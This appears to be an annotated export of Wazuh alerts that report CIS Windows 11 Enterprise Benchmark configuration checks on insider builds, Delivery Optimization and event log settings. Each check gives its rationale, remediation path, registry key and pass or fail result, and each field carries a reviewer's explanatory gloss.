data.sca.check.description: This policy setting determines whether users can access the Insider build controls in the Advanced Options for Windows Update. These controls are located under "Get Insider builds," and enable users to make their devices available for downloading and installing Windows preview software. The recommended state for this setting is: Disabled. Note: This policy setting applies only to devices running Windows 10 Pro or Windows 10 Enterprise, up until Release 1703. For Release 1709 or newer, Microsoft encourages using the Manage preview builds setting (recommendation title ‘Manage preview builds’). We have kept this setting in the benchmark to ensure that any older builds of Windows 10 in the environment are still enforced. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: It can be risky for experimental features to be allowed in an enterprise managed environment because this can introduce bugs and security holes into systems, making it easier for an attacker to gain access. It is generally preferred to only use production-ready builds. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Disabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Data Collection and Preview Builds\Toggle user control over Insider builds. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template AllowBuildPreview.admx/adml that is included with the Microsoft Windows 10 RTM (Release 1507) Administrative Templates (or newer). Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.17.8 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.cis_csc: 2.5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.pci_dss: 4.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.hipaa: 164.312.a.2.IV,164.312.e.1,164.312.e.2.I,164.312.e.2.II No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.nist_800_53: SC.8 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.tsc: CC6.1,CC6.7,CC7.2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\PreviewBuilds'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.result: failed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Download Mode' is NOT set to 'Enabled: Internet'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19009 Numeric ID of the detection rule that fired.
rule.firedtimes: 1 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2', '6.2'] PCI DSS mapping – card‑holder data rules.
rule.cis: ['18.9.18.1'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['7.3'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gpg_13: ['4.3'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gdpr_IV: ['35.7.d'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535009.2557475 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26302 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Download Mode' is NOT set to 'Enabled: Internet'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting specifies the download method that Delivery Optimization can use in downloads of Windows Updates, Apps and App updates. The following methods are supported: - 0 = HTTP only, no peering. - 1 = HTTP blended with peering behind the same NAT. - 2 = HTTP blended with peering across a private group. Peering occurs on devices in the same Active Directory Site (if exist) or the same domain by default. When this option is selected, peering will cross NATs. To create a custom group use Group ID in combination with Mode 2. - 3 = HTTP blended with Internet Peering. - 99 = Simple download mode with no peering. Delivery Optimization downloads using HTTP only and does not attempt to contact the Delivery Optimization cloud services. - 100 = Bypass mode. Do not use Delivery Optimization and use BITS instead. The recommended state for this setting is any value EXCEPT: Enabled: Internet (3). Note: The default on all SKUs other than Enterprise, Enterprise LTSB or Education is Enabled: Internet (3), so on other SKUs, be sure to set this to a different value. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Due to privacy concerns and security risks, updates should only be downloaded directly from Microsoft, or from a trusted machine on the internal network that received its updates from a trusted source and approved by the network administrator. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to any value other than Enabled: Internet (3): Computer Configuration\Policies\Administrative Templates\Windows Components\Delivery Optimization\Download Mode. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template DeliveryOptimization.admx/adml that is included with the Microsoft Windows 10 RTM (Release 1507) Administrative Templates (or newer). Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.18.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.cis_csc: 7.3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.pci_dss: 6.2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.nist_800_53: SI.2,SA.11,SI.4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.gpg_13: 4.3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.gdpr_IV: 35.7.d No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.hipaa: 164.312.b No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.tsc: A1.2,CC6.8 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\DeliveryOptimization'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.result: not applicable PASS or FAIL. Red = needs fixing.
data.sca.check.reason: Unable to read registry 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\DeliveryOptimization' (The system cannot find the file specified. ) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: sca Which log source produced the event (e.g., sysmon, auditd).
- 4. Document findings and escalate to Team Lead if needed.
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Security: Control Event Log behavior when the log file reaches its maximum size' is set to 'Disabled'.
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Security: Control Event Log behavior when the log file reaches its maximum size' is set to 'Disabled'.
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Security: Control Event Log behavior when the log file reaches its maximum size' is set to 'Disabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19008 Numeric ID of the detection rule that fired.
rule.firedtimes: 3 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2', '10.6.1'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1', 'AU.6'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.9.27.2.1'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['8.3'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gpg13: ['4.12'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gdpr_IV: ['35.7.d'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535009.2563077 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26305 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Security: Control Event Log behavior when the log file reaches its maximum size' is set to 'Disabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting controls Event Log behavior when the log file reaches its maximum size. The recommended state for this setting is: Disabled. Note: Old events may or may not be retained according to the Backup log automatically when full policy setting. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: If new events are not recorded it may be difficult or impossible to determine the root cause of system problems or the unauthorized activities of malicious users. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Disabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Event Log Service\Security\Control Event Log behavior when the log file reaches its maximum size. Note: This Group Policy path is provided by the Group Policy template EventLog.admx/adml that is included with all versions of the Microsoft Windows Administrative Templates. Note #2: In older Microsoft Windows Administrative Templates, this setting was initially named Retain old events, but it was renamed starting with the Windows 8.0 & Server 2012 (non-R2) Administrative Templates. Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.27.2.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.cis_csc: 8.3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.pci_dss: 10.6.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.nist_800_53: AU.6 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.gpg13: 4.12 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.gdpr_IV: 35.7.d No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.hipaa: 164.312.b No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.tsc: CC6.1,CC6.8,CC7.2,CC7.3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\EventLog\\Security'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.result: passed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
- 4. Document findings and escalate to Team Lead if needed.
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Security: Specify the maximum log file size (KB)' is set to 'Enabled: 196,608 or greater'.
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Security: Specify the maximum log file size (KB)' is set to 'Enabled: 196,608 or greater'.
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Security: Specify the maximum log file size (KB)' is set to 'Enabled: 196,608 or greater'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19007 Numeric ID of the detection rule that fired.
rule.firedtimes: 23 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2', '10.6.1'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1', 'AU.6'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.9.27.2.2'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['8.3'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gpg13: ['4.12'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gdpr_IV: ['35.7.d'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535009.2567241 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26306 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Security: Specify the maximum log file size (KB)' is set to 'Enabled: 196,608 or greater'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting specifies the maximum size of the log file in kilobytes. The maximum log file size can be configured between 1 megabyte (1,024 kilobytes) and 4 terabytes (4,194,240 kilobytes) in kilobyte increments. The recommended state for this setting is: Enabled: 196,608 or greater. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: If events are not recorded it may be difficult or impossible to determine the root cause of system problems or the unauthorized activities of malicious users. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Enabled: 196,608 or greater: Computer Configuration\Policies\Administrative Templates\Windows Components\Event Log Service\Security\Specify the maximum log file size (KB). Note: This Group Policy path is provided by the Group Policy template EventLog.admx/adml that is included with all versions of the Microsoft Windows Administrative Templates. Note #2: In older Microsoft Windows Administrative Templates, this setting was initially named Maximum Log Size (KB), but it was renamed starting with the Windows 8.0 & Server 2012 (non-R2) Administrative Templates. Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.27.2.2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.cis_csc: 8.3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.pci_dss: 10.6.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.nist_800_53: AU.6 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.gpg13: 4.12 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.gdpr_IV: 35.7.d No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.hipaa: 164.312.b No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.tsc: CC6.1,CC6.8,CC7.2,CC7.3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\EventLog\\Security'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.result: failed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
- 4. Document findings and escalate to Team Lead if needed.
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Setup: Specify the maximum log file size (KB)' is set to 'Enabled: 32,768 or greater'.
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Setup: Specify the maximum log file size (KB)' is set to 'Enabled: 32,768 or greater'.
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Setup: Specify the maximum log file size (KB)' is set to 'Enabled: 32,768 or greater'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19007 Numeric ID of the detection rule that fired.
rule.firedtimes: 24 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2', '10.6.1'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1', 'AU.6'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.9.27.3.2'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['8.3'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gpg13: ['4.12'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gdpr_IV: ['35.7.d'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535009.2571429 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26308 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Setup: Specify the maximum log file size (KB)' is set to 'Enabled: 32,768 or greater'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting specifies the maximum size of the log file in kilobytes. The maximum log file size can be configured between 1 megabyte (1,024 kilobytes) and 4 terabytes (4,194,240 kilobytes) in kilobyte increments. The recommended state for this setting is: Enabled: 32,768 or greater. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: If events are not recorded it may be difficult or impossible to determine the root cause of system problems or the unauthorized activities of malicious users Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Enabled: 32,768 or greater: Computer Configuration\Policies\Administrative Templates\Windows Components\Event Log Service\Setup\Specify the maximum log file size (KB). Note: This Group Policy path is provided by the Group Policy template EventLog.admx/adml that is included with all versions of the Microsoft Windows Administrative Templates. Note #2: In older Microsoft Windows Administrative Templates, this setting was initially named Maximum Log Size (KB), but it was renamed starting with the Windows 8.0 & Server 2012 (non-R2) Administrative Templates. Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.27.3.2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.cis_csc: 8.3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.pci_dss: 10.6.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.nist_800_53: AU.6 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.gpg13: 4.12 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.gdpr_IV: 35.7.d No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.hipaa: 164.312.b No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.tsc: CC6.1,CC6.8,CC7.2,CC7.3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\EventLog\\Setup'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.result: failed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
- 4. Document findings and escalate to Team Lead if needed.
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'System: Control Event Log behavior when the log file reaches its maximum size' is set to 'Disabled'.
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'System: Control Event Log behavior when the log file reaches its maximum size' is set to 'Disabled'.
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'System: Control Event Log behavior when the log file reaches its maximum size' is set to 'Disabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19008 Numeric ID of the detection rule that fired.
rule.firedtimes: 4 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2', '10.6.1'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1', 'AU.6'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.9.27.4.1'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['8.3'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gpg13: ['4.12'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gdpr_IV: ['35.7.d'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535009.2575577 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26309 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'System: Control Event Log behavior when the log file reaches its maximum size' is set to 'Disabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting controls Event Log behavior when the log file reaches its maximum size. The recommended state for this setting is: Disabled. Note: Old events may or may not be retained according to the Backup log automatically when full policy setting. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: If new events are not recorded it may be difficult or impossible to determine the root cause of system problems or the unauthorized activities of malicious users. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Disabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Event Log Service\System\Control Event Log behavior when the log file reaches its maximum size. Note: This Group Policy path is provided by the Group Policy template EventLog.admx/adml that is included with all versions of the Microsoft Windows Administrative Templates. Note #2: In older Microsoft Windows Administrative Templates, this setting was initially named Retain old events, but it was renamed starting with the Windows 8.0 & Server 2012 (non-R2) Administrative Templates. Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.27.4.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.cis_csc: 8.3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.pci_dss: 10.6.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.nist_800_53: AU.6 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.gpg13: 4.12 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.gdpr_IV: 35.7.d No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.hipaa: 164.312.b No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.tsc: CC6.1,CC6.8,CC7.2,CC7.3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\EventLog\\System'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.result: passed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
- 4. Document findings and escalate to Team Lead if needed.
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'System: Specify the maximum log file size (KB)' is set to 'Enabled: 32,768 or greater'.
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'System: Specify the maximum log file size (KB)' is set to 'Enabled: 32,768 or greater'.
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'System: Specify the maximum log file size (KB)' is set to 'Enabled: 32,768 or greater'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19007 Numeric ID of the detection rule that fired.
rule.firedtimes: 25 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2', '10.6.1'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1', 'AU.6'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.9.27.4.2'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['8.3'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gpg13: ['4.12'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gdpr_IV: ['35.7.d'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535009.2579721 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26310 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'System: Specify the maximum log file size (KB)' is set to 'Enabled: 32,768 or greater'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting specifies the maximum size of the log file in kilobytes. The maximum log file size can be configured between 1 megabyte (1,024 kilobytes) and 4 terabytes (4,194,240 kilobytes) in kilobyte increments. The recommended state for this setting is: Enabled: 32,768 or greater. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: If events are not recorded it may be difficult or impossible to determine the root cause of system problems or the unauthorized activities of malicious users Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Enabled: 32,768 or greater: Computer Configuration\Policies\Administrative Templates\Windows Components\Event Log Service\System\Specify the maximum log file size (KB). Note: This Group Policy path is provided by the Group Policy template EventLog.admx/adml that is included with all versions of the Microsoft Windows Administrative Templates. Note #2: In older Microsoft Windows Administrative Templates, this setting was initially named Maximum Log Size (KB), but it was renamed starting with the Windows 8.0 & Server 2012 (non-R2) Administrative Templates. Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.27.4.2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.cis_csc: 8.3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.pci_dss: 10.6.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.nist_800_53: AU.6 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.gpg13: 4.12 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.gdpr_IV: 35.7.d No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.hipaa: 164.312.b No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
